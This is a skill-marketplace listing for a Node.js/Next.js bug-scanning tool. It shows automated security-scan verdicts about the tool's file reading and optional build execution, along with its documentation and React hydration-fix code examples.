ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Node Auto Debugger

Scan Node.js/Express/Next.js projects for bugs, security issues, and anti-patterns. Use when debugging a Node.js web app, running code audits, fixing client-...

MIT-0 · Free to use, modify, and redistribute. No attribution required.
0 · 28 · 0 current installs · 0 all-time installs
by@jengajojo
MIT-0
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Benign
high confidence
Purpose & Capability
The name/description, SKILL.md instructions, and the included scripts/auto-debug.js are consistent: the tool scans project files for undefined vars, missing error handling, hydration issues, hardcoded secrets and can optionally run npm run build. There are no declared env vars or unrelated dependencies requested that contradict the stated purpose.
Instruction Scope
The SKILL.md and the script keep scope to the provided project directory, validating source files and package.json and (optionally) running the build. Important operational behaviors: the script recursively reads project files (including package.json and other plaintext files), detects potential secrets by regex, and will write a report file (AUTO-DEBUG-REPORT.md). It also invokes npm run build in the project directory when requested. These behaviors are expected for a code-audit/build-check tool but are sensitive (can surface secrets and will execute project-supplied build scripts).
Install Mechanism
No install spec — instruction-only with a bundled script. No remote downloads or package installs are performed by the skill itself.
Credentials
The skill declares no required environment variables or credentials. The script does not request external secrets; it reads files under the supplied project path to look for hardcoded secrets and configuration. That file-reading is proportional to the stated goal of scanning a project, but it means sensitive data in the project may be exposed in the generated report.
Persistence & Privilege
The skill is not configured as always: true and does not attempt to modify other skills or global agent settings. It writes a project-scoped report file (AUTO-DEBUG-REPORT.md), which is expected behavior for this tool.
Assessment
This tool is internally coherent and appears to do what it says, but it will read your project's source files (including package.json and any plaintext secrets), produce a report on disk, and — if you use the --build option — run npm run build which executes the project's build scripts. Only run it on projects you trust or run it inside an isolated environment (container/VM) when scanning untrusted code. Before sharing the generated AUTO-DEBUG-REPORT.md, review it for any sensitive data it may have flagged. Avoid passing a very large or root path (e.g., '/') as <project-dir> to prevent scanning unintended parts of your filesystem. If you only want static checks, run the script without the --build flag and inspect the script source yourself to confirm behavior.
scripts/auto-debug.js:216
Shell command execution detected (child_process).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.

Like a lobster shell, security has layers — review code before you run it.

Current versionv1.0.0
Download zip
latestvk975ghzb84zgmqvgmrcykwvbfd831k6v

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

SKILL.md

Node.js Auto Debugger

Automated scanner for Node.js projects — finds bugs across backend, frontend, and config.

Quick Start

node scripts/auto-debug.js <project-dir>

Options:

  • --build — Also run npm run build and capture compilation errors

What It Checks

Backend (Express/Fastify)

  • Undefined variables.push() on undeclared variables
  • Missing try/catch — async route handlers without error handling
  • Hardcoded secrets — API keys, private keys, passwords in source

Frontend (Next.js/React)

  • Missing 'use client' — hooks or browser APIs without directive
  • Hydration risksDate.now(), Math.random() in render (should be in useEffect or useState)
  • SSR crasheswindow/document access outside useEffect
  • Missing loading states — wagmi hooks without isLoading/isFetching

Config

  • Missing next.config.js — defaults warning
  • Missing build script — package.json validation

Output

Report saved to <project>/AUTO-DEBUG-REPORT.md with issues grouped by severity:

  • 🔴 Critical — will crash or leak secrets
  • 🟠 High — likely runtime errors
  • 🟡 Medium — hydration mismatches, missing loading states
  • 🟢 Low — minor issues

Exit code: 1 if any critical issues found, 0 otherwise.

Fixing Hydration Issues (Next.js)

Date.now()/new Date() in render:

// ❌ Bad — causes hydration mismatch
const now = Math.floor(Date.now() / 1000);

// ✅ Good — guard with isMounted
const [isMounted, setIsMounted] = useState(false);
useEffect(() => { setIsMounted(true); }, []);
const now = isMounted ? Math.floor(Date.now() / 1000) : 0;

Math.random() in render:

// ❌ Bad — different on server vs client
<div style={{ left: `${Math.random() * 100}%` }} />

// ✅ Good — pre-generate in useState (runs once)
const [particles] = useState(() =>
  Array.from({ length: 10 }, () => ({
    left: `${Math.random() * 100}%`,
  }))
);

window/document access:

// ❌ Bad — crashes during SSR
const width = window.innerWidth;

// ✅ Good — only after mount
const [width, setWidth] = useState(0);
useEffect(() => setWidth(window.innerWidth), []);

Files

2 total
Select a file
Select a file to preview.

Comments

Loading comments…